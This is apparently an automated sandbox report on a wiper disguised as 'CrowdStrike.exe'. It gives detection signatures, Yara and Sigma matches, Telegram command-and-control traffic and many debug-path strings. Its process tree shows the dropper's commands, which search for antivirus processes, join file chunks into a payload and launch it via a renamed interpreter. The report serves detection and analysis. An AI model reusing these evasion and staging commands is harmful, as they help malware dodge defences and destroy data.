
Windows Analysis Report
CrowdStrike.exe

Overview

General Information

Sample name: CrowdStrike.exe
Analysis ID: 1477426
MD5: 755c0350038daefb29b888b6f8739e81
SHA1: 5b2f56953b3c925693386cae5974251479f03928
SHA256: 4491901eff338ab52c85a77a3fbd3ce80fda738046ee3b7da7be468da5b331a3
Tags: exe

Detection

Hatef Wiper
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected Hatef Wiper
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign process
Sample is not signed and drops a device driver
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormally high CPU usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files

Classification

  • System is w10x64
  • CrowdStrike.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\CrowdStrike.exe" MD5: 755C0350038DAEFB29B888B6F8739E81)
    • cmd.exe (PID: 7384 cmdline: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7432 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7440 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7484 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7492 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7532 cmdline: cmd /c md 564784 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7544 cmdline: findstr /V "locatedflatrendsoperating" Ukraine MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7556 cmdline: cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Champion.pif (PID: 7572 cmdline: 564784\Champion.pif 564784\L MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • RegAsm.exe (PID: 7904 cmdline: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • timeout.exe (PID: 7588 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
Yara matches (Source, Rule, Description, Author, Strings):
  Source: 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_HatefWiper; Description: Yara detected Hatef Wiper; Author: Joe Security
  Source: Process Memory Space: RegAsm.exe PID: 7904; Rule: JoeSecurity_HatefWiper; Description: Yara detected Hatef Wiper; Author: Joe Security
  Source: 15.2.RegAsm.exe.700000.2.unpack; Rule: JoeSecurity_HatefWiper; Description: Yara detected Hatef Wiper; Author: Joe Security

        System Summary

        Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, ParentCommandLine: 564784\Champion.pif 564784\L, ParentImage: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, ParentProcessId: 7572, ParentProcessName: Champion.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, ProcessId: 7904, ProcessName: RegAsm.exe
        Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: 564784\Champion.pif 564784\L, CommandLine: 564784\Champion.pif 564784\L, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: 564784\Champion.pif 564784\L, ProcessId: 7572, ProcessName: Champion.pif
        Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, ParentCommandLine: 564784\Champion.pif 564784\L, ParentImage: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, ParentProcessId: 7572, ParentProcessName: Champion.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, ProcessId: 7904, ProcessName: RegAsm.exe
        Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\CrowdStrike.exe", ParentImage: C:\Users\user\Desktop\CrowdStrike.exe, ParentProcessId: 7312, ParentProcessName: CrowdStrike.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, ProcessId: 7384, ProcessName: cmd.exe

        HIPS / PFW / Operating System Protection Evasion

        Source: Process started; Author: Joe Security; Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7492, ProcessName: findstr.exe
        No Snort rule has matched


        AV Detection

        Source: CrowdStrike.exe; Virustotal: Detection: 20%
        Source: CrowdStrike.exe; ReversingLabs: Detection: 15%
        Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.5% probability
        Source: CrowdStrike.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
        Source: CrowdStrike.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\naveen\pgms\cpp\openfilefinder_src_vc8\listfiledrv\objfre_wxp_x86\i386\ListOpenedFileDrv.pdb` source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qyC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: G:\Gaza Hackers Team\Handala WP\SecureDeleteFilesConsole\obj\Debug\SecureDeleteFilesConsole.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.00000000007D9000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qiC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qmC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qnC:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qjC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qiC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\naveen\pgms\cpp\openfilefinder_src_vc8\listfiledrv\objfre_wxp_x86\i386\ListOpenedFileDrv.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qHC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
